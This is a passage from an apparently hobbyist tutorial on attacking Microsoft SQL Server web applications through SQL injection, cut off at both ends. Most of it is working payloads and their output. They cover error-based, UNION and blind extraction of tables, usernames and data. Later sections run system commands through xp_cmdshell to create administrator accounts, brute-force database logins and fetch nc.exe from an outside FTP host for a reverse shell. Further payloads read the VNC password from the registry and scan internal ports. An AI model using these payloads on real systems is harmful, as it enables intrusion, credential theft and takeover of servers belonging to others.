  the select list because it is not contained in an aggreate function and there is no GROUP BY clause.
  ------------------------------------------------------------------------------------

 The third column name = "news_detail", pops up in returned error. If we had more columns, 
 we could add news_detail in GROUP BY clause of previous request then we could get the forth column name.

 When we added all of column in GROUP BY clause, we will get normal result and
 we absolutely know that we obtained all column name in table1.

 As this example, the request below will generate no error.
  
  [SQLi]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1' GROUP BY news.news_id,news.news_author,news_detail HAVING 1=1--
  [End SQLi]--------------------------------------------------------------------------

 The query will be

  SELECT * FROM news WHERE news_id='1' GROUP BY news.news_id,news.news_author,news_detail HAVING 1=1--'

 As no error return, we know that table1 consists of three columns which are "news_id", "news_author" and "news_detail".


 ++++++++++++++++++++++++++++++++++++++++++++++++++++
  [0x02b] - ODBC Error Message Attack with "CONVERT"
 ++++++++++++++++++++++++++++++++++++++++++++++++++++

  In our opinion, MSSQL expresses much information in returned error. It is useful for programmers to debug their application meanwhile 
 it is valuable for many attackers, as seeing in previous section.

  In this section, we provide another method of utilizing from MSSQL error through a command called "convert".
 convert command is used to convert between two data type and when the specific data cannot convert to another type, 
 this command will return error. let see through an example:

 In this example, we show you how to obtain MSSQL_Version, DB_name, User_name.

  [SQLi]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1+and+1=convert(int,@@version)--
  [End SQLi]--------------------------------------------------------------------------
 
 Error Message returned:
  
  ------------------------------------------------------------------------------------
  Microsoft SQL Native Client error '80040e07'
  Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86) Feb 9 2007 
  22:47:07 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 1) 
  ' to data type int.
  /page.asp, line 9 
  ------------------------------------------------------------------------------------
 
 Now, We know the version of MSSQL and OS (Windows 2003 Server), Let's go to enumerate DB_name.

  [SQLi]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1+and+1=convert(int,db_name())--
  [End SQLi]--------------------------------------------------------------------------
 
 Error Message returned:
  
  ------------------------------------------------------------------------------------
  Microsoft SQL Native Client error '80040e07'
  Conversion failed when converting the nvarchar value 'cwhdb' to data type int.
  /page.asp, line 9
  ------------------------------------------------------------------------------------

 We can know the Database name = "cwhdb", Next is query for get current user that run DB.

  [SQLi]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1+and+1=convert(int,user_name())--
  [End SQLi]--------------------------------------------------------------------------

 Error Message returned:
  
  ------------------------------------------------------------------------------------
  Microsoft SQL Native Client error '80040e07'
  Conversion failed when converting the nvarchar value 'sa' to data type int.
  /showthread.asp, line 9
  ------------------------------------------------------------------------------------

 W00t!! W00t!!, It use "sa" privileges lol. This information can help us that we can use extended 
 stored procedure "XP_CMDSHELL" to run arbitrary command executes.


 In next example, we show you how to obtain table names, column names and data.

 Take a look at our First request
  
  [SQLi]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))--
  [End SQLi]--------------------------------------------------------------------------

 "information_schema.tables" stores information about tables in databases and there is a field called "table_name" 
 which stores names of each table. The result of this request is something like this:
  
  ------------------------------------------------------------------------------------
  Microsoft SQL Native Client error '80040e07'
  Conversion failed when converting the nvarchar value 'threads' to data type int.
  /page.asp, line 9 
  ------------------------------------------------------------------------------------

  From the query, we get threads as a nvarchar data type and as it cannot convert from threads to int data type, the error is returned.
 Therefore, we know the first table = "threads", from this error. The next step is looking for the second table. 
 We only put WHERE clause append the query in above request.
  
  [SQLi]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+
  not+in+('threads')))--
  [End SQLi]--------------------------------------------------------------------------

 We will get an error like this:
  
  ------------------------------------------------------------------------------------
  Microsoft SQL Native Client error '80040e07'
  Conversion failed when converting the nvarchar value 'users' to data type int.
  /page.asp, line 9 
  ------------------------------------------------------------------------------------

 Again, we know the second table = "users", from the error. If we want another table, we just append our known table list. for example,
  
  [SQLi]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+
  not+in+('threads','users')))--
  [End SQLi]--------------------------------------------------------------------------

 And we will get an error:

  ------------------------------------------------------------------------------------
  Microsoft SQL Native Client error '80040e07'
  Conversion failed when converting the nvarchar value 'forums' to data type int.
  /page.asp, line 9
  ------------------------------------------------------------------------------------

 This means the third table = "forums". On the other hand, if the previous request return something like this.
  
  ------------------------------------------------------------------------------------
  ADODB.Field error '800a0bcd'
  Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
  /page.asp, line 10
  ------------------------------------------------------------------------------------

 It means this database consists of only two tables, threads and users.

  OK, now, we already get all tables. The next target is column names.
 The method to retrieve column names is not much different from getting table names.
 We merely change from "information_schema.tables" to "information_schema.columns" and from "table_name" to "column_name"
 but we have to add "table_name" in WHERE cluase in order to specify the table which we will pull column names from.

 Don't talk too much, let see an example
  
  [SQLi]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='users'))--
  [End SQLi]--------------------------------------------------------------------------

 From this request, we get an following error
 
  ------------------------------------------------------------------------------------
  Microsoft SQL Native Client error '80040e07'
  Conversion failed when converting the nvarchar value 'uname' to data type int.
  /showthread.asp, line 9 
  ------------------------------------------------------------------------------------

 As the same approach of getting table names, we abruptly know that the first column of table 'users' is "uname".
 For another column name, we add a bit in WHERE clause.

  [SQLi]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='users'+
  and+column_name+not+in+('uname')))--
  [End SQLi]--------------------------------------------------------------------------

 We will get an below error.
  
  ------------------------------------------------------------------------------------
  Microsoft SQL Native Client error '80040e07'
  Conversion failed when converting the nvarchar value 'upass' to data type int.
  /showthread.asp, line 9 
  ------------------------------------------------------------------------------------

 Absolutely we know the second column = "upass", of table 'users'. For getting more column names, 
 we only append a known table list like that in getting table names. For example,
  
  [SQLi]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='users'+
  and+column_name+not+in+('uname','upass')))--
  [End SQLi]--------------------------------------------------------------------------

 The Error message:
  
  ------------------------------------------------------------------------------------
  Microsoft SQL Native Client error '80040e07'
  Conversion failed when converting the nvarchar value 'email' to data type int.
  /showthread.asp, line 9 
  ------------------------------------------------------------------------------------

 So, the third column is "email". but if the error is
  
  ------------------------------------------------------------------------------------
  ADODB.Field error '800a0bcd'
  Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
  /page.asp, line 10 
  ------------------------------------------------------------------------------------

 This means no more column left. Next is the real target which attackers want, the data.
 If take a look carefully, we will see that the idea is not different from getting table and column.
 Use the same manner but change only table and column name.

 If we want uname data in table users, we can do like this:
  
  [SQLi]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+uname+from+users))--
  [End SQLi]--------------------------------------------------------------------------

 We will see uname in returned error.
  
  ------------------------------------------------------------------------------------
  Microsoft SQL Native Client error '80040e07'
  Conversion failed when converting the nvarchar value 'admin' to data type int.
  /page.asp, line 9 
  ------------------------------------------------------------------------------------

 Now, we know that there is 'admin' in column 'uname' of table 'users'. For another uname, 
 we just create a known table list as table and column.

  [SQLi]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+uname+from+users+where+uname+not+in+('admin')))--
  [End SQLi]--------------------------------------------------------------------------

 Error again:
  
  ------------------------------------------------------------------------------------
  Microsoft SQL Native Client error '80040e07'
  Conversion failed when converting the nvarchar value 'cwh' to data type int.
  /page.asp, line 9
  ------------------------------------------------------------------------------------

 OK, we get another "uname" which is 'cwh'. If we try following request.
  
  [SQLi]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+uname+from+users+where+uname+not+in+('admin','cwh')))--
  [End SQLi]--------------------------------------------------------------------------

 And we get an error like this

  ------------------------------------------------------------------------------------
  ADODB.Field error '800a0bcd'
  Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
  /showthread.asp, line 10 
  ------------------------------------------------------------------------------------

 It means there are only two uname in users table (admin,cwh).
 

 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 [0x02d] - MSSQL Injection in Web Services (SOAP Injection)
 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  
  Web Services use XML messages that follow the SOAP standard and have been popular with traditional enterprise. 
 In such systems, there is often a machine-readable description of the operations offered by the service written in the 
 Web Services Description Language (WSDL). 
  SOAP is often used in large-scale enterprise applications where individual tasks are performed by different computers to 
 improve performance. It's often found where web application that deployed as a front-end to an existing application.

   Let's take a look for SOAP request like this:
 
  [SOAP Request]------------------------------------------------------------------------------

  POST /webservice/service.asmx HTTP/1.0
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.1433)
  Content-Type: text/xml; charset=utf-8
  SOAPAction: "http://tempuri.org/GetUserInfo"
  Host: testcwh.cwh.net
  Content-Length: 345
  Expect: 100-continue
  Connection: Keep-Alive
 
  
  admin1234
  
  [End Request]-------------------------------------------------------------------------------
 
   Can you see username(admin) and password(1234) that send to Server side ?

   What's happen if we injection (') single quote to username field like this: admin'1234
  before It send to Server Side. We can use Web proxy (Burpsuite, Paros proxy) to intercept SOAP request and SOAP respond.

  [SOAP Respond When we inject single quote]--------------------------------------------------
 
  HTTP/1.1 200 OK
  Date: Mon, 26 Jan 2009 15:45:27 GMT
  Server: Microsoft-IIS/6.0
  X-Powered-By: ASP.NET
  X-AspNet-Version: 2.0.50727
  Cache-Control: private, max-age=0
  Content-Type: text/xml; charset=utf-8
  Content-Length: 1057
  Connection: close
  X-Junk: xxxxxxxxxxx
 
  
  true
  System.Data.OleDb.OleDbException: Unclosed quotation mark after the character string ''.
  Incorrect syntax near '81'.
     at System.Data.OleDb.OleDbDataReader.ProcessResults(OleDbHResult hr)
     at System.Data.OleDb.OleDbDataReader.NextResult()
     at System.Data.OleDb.OleDbCommand.ExecuteReaderInternal(CommandBehavior behavior, String method)
     at System.Data.OleDb.OleDbCommand.ExecuteReader(CommandBehavior behavior)
     at Service.GetUserInfo(String username, String password)SELECT * FROM users WHERE username='admin'' 
     AND password='81dc9bdb52d04dc20036dbd8313ed055'-10001-01-01T00:00:00
     
  
  [End Respond]-------------------------------------------------------------------------------
 
  Okey, The SOAP respond return error message like that. We can use simple techiques for SQLi that we showed you 
  in section [0x02b] - ODBC Error Message Attack with "CONVERT", Let's use this SQLi: 
  
   admin' and 1=convert(int,@@version)--
 
  [SOAP Request/Respond]----------------------------------------------------------------------
  
  *** Request ***
  POST /webservice/service.asmx HTTP/1.0
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.1433)
  Content-Type: text/xml; charset=utf-8
  SOAPAction: "http://tempuri.org/GetUserInfo"
  Host: testcwh.cwh.net
  Content-Length: 384
  
  
  admin' and 1=convert(int,@@version)--1234
  
  
  
  *** Response ***
  HTTP/1.1 200 OK
  Date: Wed, 28 Jan 2009 15:59:17 GMT
  Server: Microsoft-IIS/6.0
  X-Powered-By: ASP.NET
  X-AspNet-Version: 2.0.50727
  Cache-Control: private, max-age=0
  Content-Type: text/xml; charset=utf-8
  Content-Length: 1266
  Connection: close
  X-Junk: xxxxxxxxxxx
  
  
  true
  System.Data.OleDb.OleDbException: Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86) 
  Feb  9 2007 22:47:07 
  Copyright (c) 1988-2005 Microsoft Corporation
  Express Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
  ' to data type int.
  at System.Data.OleDb.OleDbDataReader.ProcessResults(OleDbHResult hr)
  at System.Data.OleDb.OleDbDataReader.NextResult()
  at System.Data.OleDb.OleDbCommand.ExecuteReaderInternal(CommandBehavior behavior, String method)
  at System.Data.OleDb.OleDbCommand.ExecuteReader(CommandBehavior behavior)
  at Service.GetUserInfo(String username, String password)SELECT * FROM users WHERE username='admin' 
  and 1=convert(int,@@version)--' AND password='81dc9bdb52d04dc20036dbd8313ed055'-10001-01-01T00:00:00
  
 
  [End]---------------------------------------------------------------------------------------
 
   W00t!! W00t!!, We can enumerate MSSQL Version : Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86).
  Then we can use SQLi techniques that we mention above (Dump tables, columns, data, Etc).

 ++++++++++++++++++++++++++++++++++++++++++++++
  [0x02c] - MSSQL Injection with UNION Attack
 ++++++++++++++++++++++++++++++++++++++++++++++

  This method differs from the both previous methods because we do not get information through error 
 but we, instead, see it in some point of returned page.

 First of all, we have to know the exact number of selected column. We can find it by using ORDER BY clause.

  http://www.example.com/page.asp?id=1 order by 1--
  http://www.example.com/page.asp?id=1 order by 2--
  http://www.example.com/page.asp?id=1 order by 3--
  http://www.example.com/page.asp?id=1 order by 4--
  and so on

 We observe a result from each request until we get error like this.
  
  ------------------------------------------------------------------------------------
  Microsoft SQL Native Client error '80040e14'
  The ORDER BY position number 5 is out of range of the number of items in the select list.
  /showthread.asp, line 9
  ------------------------------------------------------------------------------------

 This means this page select four columns from table and this error occurs when we request http://www.example.com/page.asp?id=1 order by 5--

 Now, we use UNION operator to gain information.
  
  [SQLi]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1 and 1=2 UNION SELECT 11,22,33,44--
  [End SQLi]--------------------------------------------------------------------------

 We will see "11" or "22" or "33" or "44" appeared on some point in returned page. We assume that 
 we have already located the position which "44" occur on the screen.
 (We should remember this position because it is where our information will be appeared)

 As we found "44" on the screen, we replace "44" with "@@version" in order to find the version of MSSQL.
  
  [SQLi]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1 and 1=2 UNION SELECT 11,22,33,@@version--
  [End SQLi]--------------------------------------------------------------------------

 We will see version of MSSQL appeared in the position which "44" occurred.

 At this point, we know that next information definitely takes place in this position.

  The rest are to find table names, column names and data. As we see in previous section, 
 we can obtain table names and column names through "information_schema" database.
 We still use the same way in this approach.
  
  [SQli]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1 and 1=2 UNION SELECT 11,22,33,table_name from information_schema.tables--
  [End SQLi]--------------------------------------------------------------------------

 We will see the first table on the screen. We assume it is table called 'threads'. We can find next table by following request.
  
  [SQli]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1 and 1=2 UNION SELECT 11,22,33,table_name from information_schema.tables where table_name not in ('threads')--
  [End SQLi]--------------------------------------------------------------------------

 We assume the retrieved table is 'users'. So, we append a known table list until we get blank in position which "44" occurred.
 After we get all table names that we want, we move to gather column names.
  
  [SQli]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1 and 1=2 UNION SELECT 11,22,33,column_name from information_schema.columns where table_name='users'--
  [End SQLi]--------------------------------------------------------------------------

 From this request, we will see the first column in table 'users'. We assume it is 'uname'. For another column, we can use following request.
  
  [SQLi]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1 and 1=2 UNION SELECT 11,22,33,column_name from information_schema.columns where table_name='users' and 
  column_name not in ('uname')--
  [End SQLi]--------------------------------------------------------------------------

 We get the second column which is 'upass' and we continue appending a known column list until we get blank result.
 The most wanted information is data. It is quite simple after we obtained table names and column names. We just use following request.
  
  [SQLi]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1 and 1=2 UNION SELECT 11,22,33,uname from users--
  [End SQLi]--------------------------------------------------------------------------

 We will get data such as admin from the request. In order to get another row, we only append information list as following.

  [SQLi]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1 and 1=2 UNION SELECT 11,22,33,uname from users where uname not in ('admin')--
  [End SQLi]--------------------------------------------------------------------------
 
 Now, we can enumerate the rest data.


###########################################
 [0x03] - MSSQL Blind SQL Injection Attack
###########################################

 
 In some case, Using normal sql injection is not work. Blind sql injection is another method which may help you.
The important point for blind sql injection is the difference between the valid and invalid query result.
You have to inject a statement to make query valid or invalid and observe the response.
 Just because you don't see any results, doesn't mean that your injected SQL is not being executed !!


 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  [0x03a] - How to Test sites that are vulnerable in Blind SQL Injection
 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

  We assume that http://www.example.com/page.asp?id=1 is normal url to open web page.

 You can try to inject a statement like this

 http://www.example.com/page.asp?id=1 and 1=1 
 and
 http://www.example.com/page.asp?id=1 and 1=2

  If the results from these requests are different, it will be a good signal for you.
 This website may fall to blind sql injection vulnerability. When you put "id=1 and 1=1", 
 it means that the condition is true so, the response must be normal. 
 But the parameter "id=1 and 1=2" indicates that the condition is false 
 and if the webmaster does not provide a proper filter, the response absolutely differs from previous.


 ++++++++++++++++++++++++++++++++++++++++++++++++++++++
  [0x03b] - Determine data through Blind SQL Injection
 ++++++++++++++++++++++++++++++++++++++++++++++++++++++

  By using blind technique, you have to spend more time than normal injection. 
 You can obtain only one character while you send several queries to server.
 We will give you an example of querying the first character of database name. 
 We assume that database name is member. Therefore, the first character is "m" 
 which the ascii value is 109. (At this point, we assume that you know ascii code)

 Ok, first, we have to know that the results from requests have only 2 forms.

 1. Valid query result likes http://www.example.com/page.asp?id=1 and 1=1
 2. Invalid query result likes http://www.example.com/page.asp?id=1 and 1=2

 
 The following steps are up to each person. You idea may be different from our idea in order to pick ascii code to test query.

 http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>90

 In this situation, the result will be valid query result like http://www.example.com/page.asp?id=1 and 1=1 
 (because the first character of database name is "m" which ascii code is 109). Then, we try

 http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>120

 It is surely that the result will like http://www.example.com/page.asp?id=1 and 1=2 (because 109 absolutely less than 120).
 next, we try

 http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>105

 The result is a valid query result and at this point, the ascii value of first character of database name is between 105 and 120.
 So, we try

 http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>112  ===> invalid query result
 http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>108  ===> valid query result
 http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>110  ===> invalid query result
 http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>109  ===> invalid query result

  You see that the first character of database name has an ascii value which is greater than 108 
 but is not greater than 109. Thus, we can conclude that the ascii value is equal to 109.
 You can prove with:
 
 http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)=109 .
 
 We sure that the result is like the result of http://www.target.com/page.php?id=1 and 1=1 .

 The rest which you have to do is to manipulate some queries to collect your preferred information.
 In this tutorial, we propose some example queries in order to find the names of tables and columns in the database.


 ++++++++++++++++++++++++++++++++++++++++++++
  [0x03c] - Exploit query for get Table name 
 ++++++++++++++++++++++++++++++++++++++++++++

  In order to get table name, we can use above method to obtain each character of table name.
 The only thing that we have to do is to change query to retrieve table name of current database. 
 As MSSQL does not have limit command. Therefore, the query is a bit complicate.

 http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name) 
 FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 1 LOWER(name) FROM sysObjects WHERE xtYpe=0x55))
 AS varchar(8000)),1,1)),0)>97

  The above query is used to determine the first character of first table in current database. If we want to find second character of first table,
 we can do by following request:

 http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name) 
 FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 1 LOWER(name) FROM sysObjects WHERE xtYpe=0x55))
 AS varchar(8000)),2,1)),0)>97

  We change the second parameter of substring function from 1 to 2 in order to specify preferred position of character in table name.
 Thus, if we want to determine other positions, we require only changing second parameter of substring function.

  In case of other tables, we can find other table names by changing the second select 
 from "SELECT TOP 1" to be "SELECT TOP 2" , "SELECT TOP 3" and so on. for example,

 http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name) 
 FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 2 LOWER(name) FROM sysObjects WHERE xtYpe=0x55))
 AS varchar(8000)),1,1)),0)=97

  The above request will determine the first character of the second table name in current database.


 +++++++++++++++++++++++++++++++++++++++++++++
  [0x03d] - Exploit query for get Column name 
 +++++++++++++++++++++++++++++++++++++++++++++

  After we obtain table names, the next target information is absolutely column names. 

 http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT p.name FROM (SELECT (SELECT COUNT(i.colid)rid FROM 
 syscolumns i WHERE(i.colid<=o.colid) AND id=(SELECT id FROM sysobjects WHERE name='tablename'))x,name FROM syscolumns o WHERE 
 id=(SELECT id FROM sysobjects WHERE name='tablename')) as p WHERE(p.x=1))AS varchar(8000)),1,1)),0)>97

  In order to circumvent from magic quote filtering, you have to change 'tablename' 
 to be the form of concatenating char() command. for example, if table name is 'user', 
 when we put 'user' in the query, ' may be filtered and our query will be wrong.
 The solution is convert 'user' to be char(117)+char(115)+char(101)+char(114). 
 So, the query in where cluase changes from "Where name='user'" to "Where name=char(117)+char(115)+char(101)+char(114)".
 In this case, we can circumvent magic quote filtering. The result from the above request is the first character of the first column name of specific table.
 When we want to find the second character of the first column, we can use the same method as getting table name, by changing the second parameter of 
 substring function.

 http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT p.name FROM (SELECT (SELECT COUNT(i.colid)rid FROM 
 syscolumns i WHERE(i.colid<=o.colid) AND id=(SELECT id FROM sysobjects WHERE name='tablename'))x,name FROM syscolumns o WHERE 
 id=(SELECT id FROM sysobjects WHERE name='tablename')) as p WHERE(p.x=1))AS varchar(8000)),2,1)),0)>97

 The above request is used to determine the second character of the first column name in specific table.
 In case of determining other columns, we can do by changing p.x value from 1 to 2,3,4 and so on. such as,

 http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT p.name FROM (SELECT (SELECT COUNT(i.colid)rid FROM 
 syscolumns i WHERE(i.colid<=o.colid) AND id=(SELECT id FROM sysobjects WHERE name='tablename'))x,name FROM syscolumns o WHERE 
 id=(SELECT id FROM sysobjects WHERE name='tablename')) as p WHERE(p.x=2))AS varchar(8000)),1,1)),0)>97

 The first character of the second column name in specific table can be determined by the above request.


############################################## 
 [0x04] - More Dangerous SQL Injection Attack
##############################################
  
  In Chapter [0x02] and [0x03], We described about retrieving any useful data that was extracted from database 
 via SQL Injection techniques - for example, by performing a UNION Attack, Returning data in an error message and Blind injection. 
  This chapter will not show only an data extraction but command execution and sql worms as well.

 +++++++++++++++++++++++++++++++++++++++++++++++++++++
  [0x04a] - Dangerous from Extended Stored Procedures
 +++++++++++++++++++++++++++++++++++++++++++++++++++++

  xp_cmdshell          - Executes a given command on the MSSQL Operation system
                - Available by default on all MSSQL (Disabled on MSSQL 2005)
                - Can only be executed by 'sa' and any other users with 'sysadmin' privileges
  
  xp_regxxx            - Read/Write registry keys, potentially including the Read SAM file
   
   xp_regread 
   xp_regwrite
   xp_regdeletekey
   xp_regdeletevalue
   xp_regenumkeys
   xp_regenumvalues

   [Example for determines what null-session shares are available on the server]
   exec xp_regread HKEY_LOCAL_MACHINE,'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters','nullsessionshares'
 
  xp_servicecontrol    - Allows to Manage Services
   
   [Example Command]--------------------------------------------------------------------
   exec master..xp_servicecontrol 'start','schedule'
   exec master..xp_servicecontrol 'start','server'
   [End Command]------------------------------------------------------------------------
  
  xp_availablemedia    - Reveals the available drives on the machine
  xp_dirtree      - Allows a directory tree to be obtained
  xp_enumdsn      - Enumerates ODBC data sources on the server
  xp_makecab      - Allows the user to create a compressed archive of files on the server
  xp_ntsec_enumdomains - Enumerates domains that the server can access
  xp_terminate_process - Terminate a process (PID)
  xp_loginconfig      - Login mode
 
 +++++++++++++++++++++++++++++++++++++++++++++
  [0x04b] - Advanced SQL Injection Techniques
 +++++++++++++++++++++++++++++++++++++++++++++
  
  "xp_cmdshell" Stored procedures, executes any command shell in the server with the same permissions that it is currently running. 
 By default, only sysadmin is allowed to use it and in SQL Server 2005 it is disabled by default (it can be enabled again using sp_configure) 

 EXEC master.dbo.xp_cmdshell 'net user cwh cwh1234 /add' ;--   //Use for add user "cwh" into system.
 EXEC master.dbo.xp_cmdshell 'net localgroup administrators cwh /add' ;-- //Use for escalating privilege "cwh" to admin group

 Example through SQL injection in a numeric field via a GET request:
 http://www.example.com/news.asp?id=1; exec master.dbo.xp_cmdshell 'command'

 On MSSQL 2005 you may need to reactivate xp_cmdshell first as it's disabled by default:

 EXEC sp_configure 'show advanced options', 1;--
 RECONFIGURE;-- 
 EXEC sp_configure 'xp_cmdshell', 1;-- 
 RECONFIGURE;--  

 On MSSQL 2000:
 
 If you have 'sa' privileges but xp_cmdshell has been disabled/removed with sp_dropextendedproc, 
 we can simply inject the following code:

 EXEC sp_addextendedproc 'xp_anyname', 'xp_log70.dll';--

  This creates a new stored procedure 'xp_anyname' linked to xp_log70.dll, which provides the xp_cmdshell functionality.
 If the previous code does not work, it means that the xp_log70.dll has been moved or deleted. In this case we need to inject the following code:

  CREATE PROCEDURE xp_cmdshell(@cmd varchar(255), @Wait int = 0) AS
  DECLARE @result int, @OLEResult int, @RunResult int
  DECLARE @ShellID int
  EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT
  IF @OLEResult <> 0 SELECT @result = @OLEResult
  IF @OLEResult <> 0 RAISERROR ('CreateObject %0X', 14, 1, @OLEResult)
  EXECUTE @OLEResult = sp_OAMethod @ShellID, 'Run', Null, @cmd, 0, @Wait
  IF @OLEResult <> 0 SELECT @result = @OLEResult
  IF @OLEResult <> 0 RAISERROR ('Run %0X', 14, 1, @OLEResult)
  EXECUTE @OLEResult = sp_OADestroy @ShellID
  return @result
 
 ** Tip **

 [Question] 
  Determined that the web application connects to the DB with unprivileged account. 
 So we can't execute XP_CMDSHELL or access any interesting data ?

 [Answer]   
  It's not the end, First we must enumerate MSSQL user accounts that have system administrator privileges.

 [Code]--------------------------------------------------------------------------------------
 http://www.example.com/news.asp?id=1 union all select null,null,name,null,null,null,null from master..syslogins where name not in ('sa') and sysadmin=1;--
 [End Code]----------------------------------------------------------------------------------
  
 [Result]------------------------------------------------------------------------------------
 sa
 cwh
 example
 [End Result]--------------------------------------------------------------------------------
  
  We can use "OPENROWSET" to re-connect to the same database server under each enumerated 
 sysadmin account and guess passwords. This was automated via a Perl script to do brute-force password guessing through the SQL injection:
 
 [Code]--------------------------------------------------------------------------------------
 http://www.example.com/news.asp?id=1 union select * from openrowset('SQLoledb','server=VICTIMDBNAME;uid=$USER;pwd=$PASS','select * from master..sysusers')--
 [End Code]----------------------------------------------------------------------------------

 //Result: Found that "CWH" has a "1234"
     
  Leveraged the "OPENDATASOURCE" function to execute a stored procedure on the database, under the "CWH" system administrator credentials:
 
 [Code]--------------------------------------------------------------------------------------
 http://www.example.com/news.asp?id=1; EXEC opendatasource('SQLoledb','Persist Security Info=False;DataSource=VICTIMDBNAME;UserID=CWH;Password=1234').master
 .dbo.xp_cmdshell 'net user hacklol 1234 /add';
 [End Code]----------------------------------------------------------------------------------

 //Dirty Attack: use TFTP Netcat and run a reverse shell. Gained Internet access to the internal network.

 
 = How about Upload of executables ? =

  Once we can use xp_cmdshell (either the native one or a custom one), we can easily upload executables on the target DB Server. 
 A very common choice is netcat.exe, but any trojan will be useful here. If the target is allowed to start FTP connections to the tester's machine, 
 all that is needed is to inject the following queries: 
 
 exec master..xp_cmdshell 'echo open ftp.tester.org > ftpscript.txt';--
 exec master..xp_cmdshell 'echo USER >> ftpscript.txt';-- 
 exec master..xp_cmdshell 'echo PASS >> ftpscript.txt';--
 exec master..xp_cmdshell 'echo bin >> ftpscript.txt';--
 exec master..xp_cmdshell 'echo get nc.exe >> ftpscript.txt';--
 exec master..xp_cmdshell 'echo quit >> ftpscript.txt';--
 exec master..xp_cmdshell 'ftp -s:ftpscript.txt';--


 = How about Retrieving VNC Password from Registry ? =

 '; declare @out binary(8)
 exec master..xp_regread
 @rootkey = 'HKEY_LOCAL_MACHINE',
 @key = 'SOFTWARE\ORL\WinVNC3\Default',
 @value_name='password',
 @value = @out output
 select cast (@out as bigint) as x into TEMP--
 
 ' and 1 in (select cast(x as varchar) from temp)--


 = How about Port Scanning ? =

  We can use SQL injection vulnerability as a rudimentary IP/Port Scanner of the Internal Network or Internet

 [Code]--------------------------------------------------------------------------------------
 http://www.example.com/news.asp?id=1 union select * from openrowset('SQLoledb','uid=sa;pwd=;Network=DBMSSOCN;Address=10.10.10.12,80;timeout=5',
 'select * from table')--
 [End Code]----------------------------------------------------------------------------------
  
   This Code will outbound the connection to 10.10.10.12 over port 80. If the port is closed, the timeout (5 seconds) 
